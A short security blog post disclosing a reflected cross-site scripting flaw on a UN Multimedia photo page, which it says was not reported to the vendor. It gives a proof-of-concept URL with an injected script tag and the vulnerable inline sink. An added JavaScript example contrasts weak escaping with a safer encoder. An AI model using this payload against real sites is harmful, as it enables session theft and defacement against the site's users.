This site is my sandbox. I post security vulnerabilities I discover, project updates, and the occasional rant. Comments are usually disabled, but if you need to contact me, I am sure you will find a way to.

UN Multimedia

Date: Mar-21-2011
Vendor Notified: No
Proof of Concept:
http://www.unmultimedia.org/photo/detail.jsp?id=403/403478&key=2&query=%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E

 

Vectors:

  • <script type="text/javascript"> sendRequest('2', '2', '</script>"><script>alert(0)</script>', '', ''); </script>
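The vector above reflects `query` into a JavaScript string literal inside an inline script block. The following added example (not code from this post or from the affected site) shows why escaping quotes alone does not help in that context, and one output encoding that does. The function names and the rendering template are assumptions modelled on the vector.

```javascript
// Added example (not the site's code): why the vector works and one fix.
// The template below mirrors the inline <script> sink shown in the vector;
// render(), escapeQuotesOnly() and escapeForInlineScript() are hypothetical names.

// Constructed input: the decoded `query` parameter from the proof-of-concept URL.
const query = decodeURIComponent(
  '%3C/script%3E%22%3E%3Cscript%3Ealert%280%29%3C/script%3E');

// Weak: escapes backslashes and quotes only. The HTML parser closes the script
// element at the first "</script" it sees, whatever the JS quoting says.
function escapeQuotesOnly(s) {
  return s.replace(/\\/g, '\\\\').replace(/'/g, "\\'").replace(/"/g, '\\"');
}

// Hardened: every UTF-16 code unit outside a small allowlist becomes \uXXXX,
// so no "<", ">", "/", quote, backslash or line terminator reaches the page.
function escapeForInlineScript(s) {
  return s.replace(/[^A-Za-z0-9 ,._-]/g,
    (ch) => '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// Place the escaped value in the third sendRequest() argument, as on the page.
function render(escape, value) {
  return '<script type="text/javascript"> sendRequest(\'2\', \'2\', \'' +
    escape(value) + '\', \'\', \'\'); </script>';
}

// Number of script end tags an HTML tokenizer would find in the markup.
function scriptEndTags(html) {
  return (html.match(/<\/script/gi) || []).length;
}

// Reverse the \uXXXX escapes, i.e. what the JS engine hands to sendRequest().
function decodeJsEscapes(s) {
  return s.replace(/\\u([0-9a-f]{4})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

console.log('quotes only:', scriptEndTags(render(escapeQuotesOnly, query)));
console.log('hardened   :', scriptEndTags(render(escapeForInlineScript, query)));
console.log(render(escapeForInlineScript, query));
```

With quote escaping only, the markup contains three script end tags, so the original block is terminated early and a second one starts; with the hardened encoder only the template's own end tag remains and the JavaScript engine still receives the original string.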



Copyright © 2012 benburns.org